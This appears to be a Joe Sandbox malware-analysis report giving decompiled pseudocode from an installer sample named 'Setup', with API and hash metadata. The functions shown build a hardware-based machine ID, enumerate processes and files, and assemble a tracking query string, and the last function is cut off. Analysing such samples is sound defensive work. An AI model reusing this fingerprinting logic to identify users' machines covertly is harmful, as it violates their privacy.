                                                                                                                                                              				WCHAR* _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v36;
                                                                                                                                                              				int _v40;
                                                                                                                                                              				char _v44;
                                                                                                                                                              				long _v48;
                                                                                                                                                              				intOrPtr _v6128;
                                                                                                                                                              				char _v6528;
                                                                                                                                                              				char _v7046;
                                                                                                                                                              				char _v7048;
                                                                                                                                                              				intOrPtr _v7052;
                                                                                                                                                              				WCHAR* _v7056;
                                                                                                                                                              				intOrPtr _v7060;
                                                                                                                                                              				char _v7092;
                                                                                                                                                              				char _v7093;
                                                                                                                                                              				intOrPtr _v7100;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              				signed int _t55;
                                                                                                                                                              				int _t59;
                                                                                                                                                              				char* _t62;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				void* _t71;
                                                                                                                                                              				void* _t77;
                                                                                                                                                              				void* _t111;
                                                                                                                                                              				signed int _t112;
                                                                                                                                                              
                                                                                                                                                              				_t111 = __esi;
                                                                                                                                                              				_t110 = __edi;
                                                                                                                                                              				_t77 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x507eec);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				E0045D8E0(0x1bac);
                                                                                                                                                              				_t54 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t55 = _t54 ^ _t112;
                                                                                                                                                              				_v20 = _t55;
                                                                                                                                                              				_push(_t55);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v7100 = __ecx;
                                                                                                                                                              				E00451D90(__edi,  &_v36, 0, 0x10);
                                                                                                                                                              				_v48 = 0;
                                                                                                                                                              				_t59 = GetVolumeInformationW(L"C:\\", 0, 0,  &_v48, 0, 0, 0, 0); // executed
                                                                                                                                                              				_v40 = _t59;
                                                                                                                                                              				_v36 = _v48;
                                                                                                                                                              				_v44 = 0x1950;
                                                                                                                                                              				E00451D90(_t110,  &_v6528, 0, _v44);
                                                                                                                                                              				_push( &_v44);
                                                                                                                                                              				_t62 =  &_v6528;
                                                                                                                                                              				_push(_t62); // executed
                                                                                                                                                              				L0044F17E(); // executed
                                                                                                                                                              				if(_t62 == 0) {
                                                                                                                                                              					_v7052 = _v6128;
                                                                                                                                                              					_v7056 = 0;
                                                                                                                                                              					while(_v7056 < _v7052) {
                                                                                                                                                              						 *((char*)(_t112 + _v7056 - 0x16)) =  *((intOrPtr*)(_t112 + _v7056 - 0x17e8));
                                                                                                                                                              						_v7056 =  &(_v7056[0]);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v7048 = 0;
                                                                                                                                                              				E00451D90(_t110,  &_v7046, 0, 0x206);
                                                                                                                                                              				__imp__StringFromGUID2( &_v36,  &_v7048, 0x104);
                                                                                                                                                              				_t65 = E00434050( &_v7093);
                                                                                                                                                              				_t106 =  &_v7048;
                                                                                                                                                              				E00417910( &_v7048, _t65);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004181D0(_v7100 + 4,  &_v7092);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_v7060 = E004259F0(_v7100 + 8, __eflags, L"{-}", 0);
                                                                                                                                                              				while(1) {
                                                                                                                                                              					__eflags = _v7060 - 0xffffffff;
                                                                                                                                                              					if(_v7060 == 0xffffffff) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t106 = _v7060;
                                                                                                                                                              					E00417A20(_t77, _v7100 + 8, _t110, _t111, _v7060, 1);
                                                                                                                                                              					__eflags = _v7100 + 8;
                                                                                                                                                              					_v7060 = E004259F0(_v7100 + 8, _v7100 + 8, L"{-}", _v7060);
                                                                                                                                                              				}
                                                                                                                                                              				_t71 = E0041A3D0(_v7100 + 4);
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				__eflags = _v20 ^ _t112;
                                                                                                                                                              				return E0044F6C8(_t71, _t77, _v20 ^ _t112, _t106, _t110, _t111);
                                                                                                                                                              			}






























                                                                                                                                                              APIs
                                                                                                                                                              • _memset.LIBCMT ref: 004F4BFD
                                                                                                                                                              • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F4C21
                                                                                                                                                              • _memset.LIBCMT ref: 004F4C44
                                                                                                                                                              • GetAdaptersInfo.IPHLPAPI(?,?), ref: 004F4C57
                                                                                                                                                              • _memset.LIBCMT ref: 004F4CC5
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000104,?,?,?,?,?,?,&moldid=,00000000,?,?,?,?,?), ref: 004F4CDD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memset$AdaptersFromInfoInformationStringVolume
                                                                                                                                                              • String ID: C:\${-}${-}
                                                                                                                                                              • API String ID: 3941708474-2681429196
                                                                                                                                                              • Opcode ID: 16b8df58f7d386e11392ccd5ae140c1c489cdaaa900356e08ee5eeba1650c5df
                                                                                                                                                              • Instruction ID: 2c91b6d981af4eadff72b74c93defabb846fcc535acab3a6063feb5631383c31
                                                                                                                                                              • Opcode Fuzzy Hash: 16b8df58f7d386e11392ccd5ae140c1c489cdaaa900356e08ee5eeba1650c5df
                                                                                                                                                              • Instruction Fuzzy Hash: 1A5170749042189BDB24DF94CC51BEEB778AF48714F1042DEE609A72C1EB746A84CF68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E0049D9C0(int __edx, long _a4) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				signed int _v16;
                                                                                                                                                              				int _v556;
                                                                                                                                                              				intOrPtr _v572;
                                                                                                                                                              				void* _v580;
                                                                                                                                                              				signed int _v581;
                                                                                                                                                              				int _v588;
                                                                                                                                                              				signed int _t28;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              				int _t34;
                                                                                                                                                              				int _t39;
                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                              				signed int _t51;
                                                                                                                                                              
                                                                                                                                                              				_t47 = __edx;
                                                                                                                                                              				_t28 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v16 = _t28 ^ _t51;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t30 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                              				_v12 = _t30;
                                                                                                                                                              				if(_v12 != 0xffffffff) {
                                                                                                                                                              					_v580 = 0x22c;
                                                                                                                                                              					if(_a4 == 0) {
                                                                                                                                                              						_a4 = GetCurrentProcessId();
                                                                                                                                                              					}
                                                                                                                                                              					_push( &_v580);
                                                                                                                                                              					_t34 = Process32FirstW(_v12); // executed
                                                                                                                                                              					_v581 = _t47;
                                                                                                                                                              					while((_v581 & 0x000000ff) != 0) {
                                                                                                                                                              						if(_v572 == _a4) {
                                                                                                                                                              							_v8 = _v556;
                                                                                                                                                              						}
                                                                                                                                                              						if(_v8 != 0) {
                                                                                                                                                              							L10:
                                                                                                                                                              							_v588 = 0;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t39 = Process32NextW(_v12,  &_v580); // executed
                                                                                                                                                              							if(_t39 == 0) {
                                                                                                                                                              								goto L10;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v588 = 1;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t47 = _v588;
                                                                                                                                                              						_v581 = _v588;
                                                                                                                                                              					}
                                                                                                                                                              					FindCloseChangeNotification(_v12); // executed
                                                                                                                                                              				}
                                                                                                                                                              				return E0044F6C8(_v8, _t41, _v16 ^ _t51, _t47, _t49, _t50);
                                                                                                                                                              			}




















                                                                                                                                                              APIs
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0049D9DE
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0049DA00
                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0049DA14
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0049DA54
                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 0049DA85
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process32$ChangeCloseCreateCurrentFindFirstNextNotificationProcessSnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1594840063-0
                                                                                                                                                              • Opcode ID: d861248f22b9e8738e682d16beab98e63d0608105bc6e0e536ca83f65de22f70
                                                                                                                                                              • Instruction ID: 2ab5695731c723cb54ced3e96b23633eb8c252716f13112e9c65ba2f165a2eb0
                                                                                                                                                              • Opcode Fuzzy Hash: d861248f22b9e8738e682d16beab98e63d0608105bc6e0e536ca83f65de22f70
                                                                                                                                                              • Instruction Fuzzy Hash: C3211D70D04218EBDF20DFA5C8887EDBBB4AF14304F1441EAE409A7290DB789AD8CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E0049F0E0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				signed int _v53;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				char _v92;
                                                                                                                                                              				void* _v96;
                                                                                                                                                              				struct _WIN32_FIND_DATAW _v688;
                                                                                                                                                              				char _v689;
                                                                                                                                                              				char _v690;
                                                                                                                                                              				char _v724;
                                                                                                                                                              				char _v725;
                                                                                                                                                              				char _v756;
                                                                                                                                                              				void* _v788;
                                                                                                                                                              				char _v789;
                                                                                                                                                              				char _v820;
                                                                                                                                                              				char _v821;
                                                                                                                                                              				intOrPtr _v828;
                                                                                                                                                              				intOrPtr _v832;
                                                                                                                                                              				intOrPtr _v836;
                                                                                                                                                              				intOrPtr _v840;
                                                                                                                                                              				intOrPtr _v844;
                                                                                                                                                              				char _v848;
                                                                                                                                                              				char _v852;
                                                                                                                                                              				signed int _v856;
                                                                                                                                                              				signed int _v860;
                                                                                                                                                              				signed int _t84;
                                                                                                                                                              				signed int _t85;
                                                                                                                                                              				void* _t97;
                                                                                                                                                              				signed int _t100;
                                                                                                                                                              				signed int _t110;
                                                                                                                                                              				intOrPtr _t125;
                                                                                                                                                              				signed int _t171;
                                                                                                                                                              				intOrPtr _t173;
                                                                                                                                                              				intOrPtr _t174;
                                                                                                                                                              				signed int _t175;
                                                                                                                                                              				void* _t176;
                                                                                                                                                              				void* _t177;
                                                                                                                                                              
                                                                                                                                                              				_t174 = __esi;
                                                                                                                                                              				_t173 = __edi;
                                                                                                                                                              				_t125 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50b34f);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t177 = _t176 - 0x34c;
                                                                                                                                                              				_t84 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t85 = _t84 ^ _t175;
                                                                                                                                                              				_v20 = _t85;
                                                                                                                                                              				_push(_t85);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				E004175C0(E00434050( &_v689));
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004175C0(E00434050( &_v690));
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				_v60 = E0041C5A0(_a4 + 4, 0x5c, 0xffffffff);
                                                                                                                                                              				if(_v60 >= 0) {
                                                                                                                                                              					__eflags = _a4 + 4;
                                                                                                                                                              					_v828 = E00405260(_a4 + 4,  &_v756, 0, _v60 + 1);
                                                                                                                                                              					_v832 = _v828;
                                                                                                                                                              					_v8 = 3;
                                                                                                                                                              					E00409880( &_v52, __eflags, _v832);
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					E004178C0( &_v756);
                                                                                                                                                              				} else {
                                                                                                                                                              					E00417910(0x52d34c, E00434050( &_v725));
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					E004181D0( &_v52,  &_v724);
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              				}
                                                                                                                                                              				_t97 = FindFirstFileW(E00416A30(_a4 + 4),  &_v688); // executed
                                                                                                                                                              				_v96 = _t97;
                                                                                                                                                              				_v53 = 1;
                                                                                                                                                              				while((_v53 & 0x000000ff) == 1 && _v96 != 0xffffffff) {
                                                                                                                                                              					_v836 = E00417910( &(_v688.cFileName), E00434050( &_v789));
                                                                                                                                                              					_v840 = _v836;
                                                                                                                                                              					_v8 = 4;
                                                                                                                                                              					_v844 = _v840;
                                                                                                                                                              					if(_v844 == 0) {
                                                                                                                                                              						_v848 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v848 = _v844 + 4;
                                                                                                                                                              					}
                                                                                                                                                              					_t182 =  &_v52;
                                                                                                                                                              					if( &_v52 == 0) {
                                                                                                                                                              						_v852 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v852 =  &_v52 + 4;
                                                                                                                                                              					}
                                                                                                                                                              					_t110 = E00409960( &_v820, _v852, _v848);
                                                                                                                                                              					_t177 = _t177 + 0xc;
                                                                                                                                                              					_v856 = _t110;
                                                                                                                                                              					_v860 = _v856;
                                                                                                                                                              					_v8 = 5;
                                                                                                                                                              					_t171 = _v860;
                                                                                                                                                              					E00409880( &_v92, _t182, _t171);
                                                                                                                                                              					_v8 = 4;
                                                                                                                                                              					E004178C0( &_v820);
                                                                                                                                                              					_v8 = 1;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              					E00425AB0(_a8, _t182,  &_v92);
                                                                                                                                                              					_v53 = _t171 & 0xffffff00 | FindNextFileW(_v96,  &_v688) != 0x00000000;
                                                                                                                                                              				}
                                                                                                                                                              				FindClose(_v96); // executed
                                                                                                                                                              				_t100 = E00447780(_a8);
                                                                                                                                                              				__eflags = 0 - _t100;
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				_v821 =  ~_t100;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				__eflags = _v20 ^ _t175;
                                                                                                                                                              				return E0044F6C8(_v821, _t125, _v20 ^ _t175, 0, _t173, _t174);
                                                                                                                                                              			}











































                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000,-00000001,0000005C,000000FF,00000000,00000000,DDD124F9), ref: 0049F1F8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                              • Opcode ID: a26dd83c163b041f37544551c5816758a5a807a1d5133d7aca4cc513257ce788
                                                                                                                                                              • Instruction ID: cc1ef078bf7205146ab4a592bcf7a98bcf4aa0962d6995632bada8dfdccf46d9
                                                                                                                                                              • Opcode Fuzzy Hash: a26dd83c163b041f37544551c5816758a5a807a1d5133d7aca4cc513257ce788
                                                                                                                                                              • Instruction Fuzzy Hash: 03716D70914258DFDB19DBA5CC94BEDBBB8AF14304F1441EEE00AA7291DB382B88CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004DFFD0(void* __ebx, void* __edi, void* __esi, char _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				char _v52;
                                                                                                                                                              				char _v56;
                                                                                                                                                              				char _v84;
                                                                                                                                                              				char _v88;
                                                                                                                                                              				char _v89;
                                                                                                                                                              				char _v90;
                                                                                                                                                              				char _v120;
                                                                                                                                                              				char _v152;
                                                                                                                                                              				char _v180;
                                                                                                                                                              				char _v212;
                                                                                                                                                              				char _v240;
                                                                                                                                                              				void* _v272;
                                                                                                                                                              				char _v273;
                                                                                                                                                              				char _v304;
                                                                                                                                                              				void* _v336;
                                                                                                                                                              				char _v337;
                                                                                                                                                              				char _v368;
                                                                                                                                                              				char _v400;
                                                                                                                                                              				char _v401;
                                                                                                                                                              				char _v448;
                                                                                                                                                              				char _v480;
                                                                                                                                                              				char _v512;
                                                                                                                                                              				char _v544;
                                                                                                                                                              				char _v572;
                                                                                                                                                              				char _v600;
                                                                                                                                                              				char _v628;
                                                                                                                                                              				char _v656;
                                                                                                                                                              				char _v688;
                                                                                                                                                              				char _v716;
                                                                                                                                                              				char _v748;
                                                                                                                                                              				char _v776;
                                                                                                                                                              				char _v804;
                                                                                                                                                              				char _v836;
                                                                                                                                                              				char _v864;
                                                                                                                                                              				char _v892;
                                                                                                                                                              				char _v924;
                                                                                                                                                              				char _v952;
                                                                                                                                                              				signed int _v956;
                                                                                                                                                              				char _v960;
                                                                                                                                                              				intOrPtr _v964;
                                                                                                                                                              				intOrPtr _v968;
                                                                                                                                                              				intOrPtr _v972;
                                                                                                                                                              				intOrPtr _v976;
                                                                                                                                                              				char _v980;
                                                                                                                                                              				intOrPtr _v984;
                                                                                                                                                              				intOrPtr _v988;
                                                                                                                                                              				intOrPtr _v992;
                                                                                                                                                              				intOrPtr _v996;
                                                                                                                                                              				intOrPtr _v1000;
                                                                                                                                                              				char _v1004;
                                                                                                                                                              				intOrPtr _v1008;
                                                                                                                                                              				intOrPtr _v1012;
                                                                                                                                                              				intOrPtr _v1016;
                                                                                                                                                              				intOrPtr _v1020;
                                                                                                                                                              				intOrPtr _v1024;
                                                                                                                                                              				char _v1028;
                                                                                                                                                              				intOrPtr _v1032;
                                                                                                                                                              				intOrPtr _v1036;
                                                                                                                                                              				intOrPtr _v1040;
                                                                                                                                                              				intOrPtr _v1044;
                                                                                                                                                              				intOrPtr _v1048;
                                                                                                                                                              				char _v1052;
                                                                                                                                                              				intOrPtr _v1056;
                                                                                                                                                              				intOrPtr _v1060;
                                                                                                                                                              				intOrPtr _v1064;
                                                                                                                                                              				intOrPtr _v1068;
                                                                                                                                                              				intOrPtr _v1072;
                                                                                                                                                              				intOrPtr _v1076;
                                                                                                                                                              				char _v1080;
                                                                                                                                                              				intOrPtr _v1084;
                                                                                                                                                              				intOrPtr _v1088;
                                                                                                                                                              				intOrPtr _v1092;
                                                                                                                                                              				char _v1096;
                                                                                                                                                              				intOrPtr _v1100;
                                                                                                                                                              				intOrPtr _v1104;
                                                                                                                                                              				intOrPtr _v1108;
                                                                                                                                                              				char _v1112;
                                                                                                                                                              				intOrPtr _v1116;
                                                                                                                                                              				intOrPtr _v1120;
                                                                                                                                                              				intOrPtr _v1124;
                                                                                                                                                              				intOrPtr _v1128;
                                                                                                                                                              				intOrPtr _v1132;
                                                                                                                                                              				intOrPtr _v1136;
                                                                                                                                                              				char _v1140;
                                                                                                                                                              				intOrPtr _v1144;
                                                                                                                                                              				intOrPtr _v1148;
                                                                                                                                                              				char _v1152;
                                                                                                                                                              				intOrPtr _v1156;
                                                                                                                                                              				intOrPtr _v1160;
                                                                                                                                                              				char _v1164;
                                                                                                                                                              				intOrPtr _v1168;
                                                                                                                                                              				intOrPtr _v1172;
                                                                                                                                                              				intOrPtr _v1176;
                                                                                                                                                              				intOrPtr _v1180;
                                                                                                                                                              				intOrPtr _v1184;
                                                                                                                                                              				char _v1188;
                                                                                                                                                              				char _v1192;
                                                                                                                                                              				intOrPtr _v1196;
                                                                                                                                                              				intOrPtr _v1200;
                                                                                                                                                              				char _v1204;
                                                                                                                                                              				intOrPtr _v1208;
                                                                                                                                                              				intOrPtr _v1212;
                                                                                                                                                              				intOrPtr _v1216;
                                                                                                                                                              				intOrPtr _v1220;
                                                                                                                                                              				intOrPtr _v1224;
                                                                                                                                                              				char _v1228;
                                                                                                                                                              				char* _v1232;
                                                                                                                                                              				char _v1236;
                                                                                                                                                              				intOrPtr _v1240;
                                                                                                                                                              				intOrPtr _v1244;
                                                                                                                                                              				char _v1248;
                                                                                                                                                              				intOrPtr _v1252;
                                                                                                                                                              				intOrPtr _v1256;
                                                                                                                                                              				intOrPtr _v1260;
                                                                                                                                                              				intOrPtr _v1264;
                                                                                                                                                              				intOrPtr _v1268;
                                                                                                                                                              				char _v1272;
                                                                                                                                                              				intOrPtr _v1276;
                                                                                                                                                              				intOrPtr _v1280;
                                                                                                                                                              				signed int _t387;
                                                                                                                                                              				signed int _t388;
                                                                                                                                                              				intOrPtr _t401;
                                                                                                                                                              				void* _t406;
                                                                                                                                                              				intOrPtr _t407;
                                                                                                                                                              				intOrPtr _t410;
                                                                                                                                                              				void* _t417;
                                                                                                                                                              				void* _t423;
                                                                                                                                                              				void* _t424;
                                                                                                                                                              				void* _t425;
                                                                                                                                                              				intOrPtr _t432;
                                                                                                                                                              				void* _t438;
                                                                                                                                                              				intOrPtr _t447;
                                                                                                                                                              				intOrPtr _t449;
                                                                                                                                                              				intOrPtr _t456;
                                                                                                                                                              				intOrPtr* _t464;
                                                                                                                                                              				intOrPtr _t475;
                                                                                                                                                              				intOrPtr _t478;
                                                                                                                                                              				signed char _t482;
                                                                                                                                                              				intOrPtr _t483;
                                                                                                                                                              				void* _t488;
                                                                                                                                                              				intOrPtr _t500;
                                                                                                                                                              				signed char _t503;
                                                                                                                                                              				intOrPtr _t507;
                                                                                                                                                              				signed char _t512;
                                                                                                                                                              				intOrPtr _t515;
                                                                                                                                                              				void* _t531;
                                                                                                                                                              				intOrPtr _t534;
                                                                                                                                                              				intOrPtr _t547;
                                                                                                                                                              				intOrPtr _t555;
                                                                                                                                                              				intOrPtr _t561;
                                                                                                                                                              				intOrPtr _t573;
                                                                                                                                                              				intOrPtr _t580;
	void* _t586;
	intOrPtr _t646;
	intOrPtr _t747;
	intOrPtr _t748;
	void* _t790;
	void* _t791;
	signed int _t792;
	void* _t793;
	void* _t795;
	void* _t797;
	void* _t798;
	void* _t802;
	void* _t805;
	void* _t806;
	void* _t807;
	void* _t810;
	void* _t811;
	void* _t812;
	void* _t813;
	void* _t814;
	void* _t815;
	void* _t817;
	void* _t818;
	void* _t820;

	_t791 = __esi;
	_t790 = __edi;
	_t586 = __ebx;
	_push(0xffffffff);
	_push(0x51279e);
	_push( *[fs:0x0]);
	_t387 =  *0x561244; // 0xddd124f9
	_t388 = _t387 ^ _t792;
	_v24 = _t388;
	_push(_t388);
	 *[fs:0x0] =  &_v16;
	_v956 = 0;
	E004175C0(E00434050( &_v89));
	_v8 = 1;
	E004175C0(E00434050( &_v90));
	_v8 = 2;
	E004D6610( &_v56);
	_t795 = _t793 - 0x4f0 + 4;
	_t821 =  &_v56;
	if( &_v56 == 0) {
		_v960 = 0;
	} else {
		_v960 =  &_v56 + 4;
	}
	_v964 = E00409760( &_v120, L"ver=", _v960);
	_v968 = _v964;
	_v8 = 3;
	E00409880( &_v88, _t821, _v968);
	_v8 = 2;
	E004178C0( &_v120);
	_t401 = E004FDB00(_t586, _t790, _t791, _t821,  &_v152);
	_t797 = _t795 + 0x10;
	_v972 = _t401;
	_v976 = _v972;
	_v8 = 4;
	E004181D0( &_v56, _v976);
	_v8 = 2;
	E004176E0();
	if((E00416630( &_v52) & 0x000000ff) == 0) {
		_t823 =  &_v56;
		if( &_v56 == 0) {
			_v980 = 0;
		} else {
			_v980 =  &_v56 + 4;
		}
		_t580 = E00409760( &_v180, "&", _v980);
		_t797 = _t797 + 0xc;
		_v984 = _t580;
		_v988 = _v984;
		_v8 = 5;
		E00405120( &_v84, _v988);
		_v8 = 2;
		E004178C0( &_v180);
	}
	_t406 = E004228A0(); // executed
	_t407 = E00483530(_t586, _t406, _t790, _t791, _t823,  &_v212); // executed
	_v992 = _t407;
	_v996 = _v992;
	_v8 = 6;
	_v1000 = _v996;
	if(_v1000 == 0) {
		_v1004 = 0;
	} else {
		_v1004 = _v1000 + 4;
	}
	_t410 = E00409760( &_v240, L"&mntrId=", _v1004);
	_t798 = _t797 + 0xc;
	_v1008 = _t410;
	_v1012 = _v1008;
	_v8 = 7;
	E00405120( &_v84, _v1012);
	_v8 = 6;
	E004178C0( &_v240);
	_v8 = 2;
	E004176E0();
	_v1016 = E00417910(L"&moldid=", E00434050( &_v273));
	_v1020 = _v1016;
	_v8 = 8;
	_v1024 = _v1020;
	_t825 = _v1024;
	if(_v1024 == 0) {
		_v1028 = 0;
	} else {
		_v1028 = _v1024 + 4;
	}
	_t417 = E004F4DC0(_t586, _t790, _t791); // executed
	_v1032 = E004098D0( &_v304, _v1028, _t417);
	_v1036 = _v1032;
	_v8 = 9;
	E00405120( &_v84, _v1036);
	_v8 = 8;
	E004178C0( &_v304);
	_v8 = 2;
	E004176E0();
	_t423 = E0049D9C0( &_v56, 0); // executed
	_t424 = E0049D9C0( &_v56, _t423); // executed
	_t425 = E00496160(_t586, _t790, _t791, _t825, _t424,  &_v56); // executed
	_t802 = _t798 + 0x1c;
	if(_t425 != 0) {
		_v1040 = E00417910(L"&sufn=", E00434050( &_v337));
		_v1044 = _v1040;
		_v8 = 0xa;
		_v1048 = _v1044;
		_t827 = _v1048;
		if(_v1048 == 0) {
			_v1052 = 0;
		} else {
			_v1052 = _v1048 + 4;
		}
		_t573 = E004098D0( &_v368, _v1052, PathFindFileNameW(E00416A30( &_v52)));
		_t802 = _t802 + 0xc;
		_v1056 = _t573;
		_v1060 = _v1056;
		_v8 = 0xb;
		E00405120( &_v84, _v1060);
		_v8 = 0xa;
		E004178C0( &_v368);
		_v8 = 2;
		E004176E0();
	}
	E00417910(L"WBR", E00434050( &_v401));
	_v8 = 0xc;
	_v1064 = E00501530(E00501CE0(), _t827,  &_v448,  &_v400);
	_v1068 = _v1064;
	_v8 = 0xd;
	_t432 = E00490D50(_t586, E00490220(), _t790, _t791, _t827,  &_v480); // executed
	_v1072 = _t432;
	_v1076 = _v1072;
	_v8 = 0xe;
	_push(E00404760(_v1068, 7));
	_push(E004D4BC0(E004DCB20(_t586, _t790, _t791, _t827)));
	_push(E00416A30(_v1076 + 4));
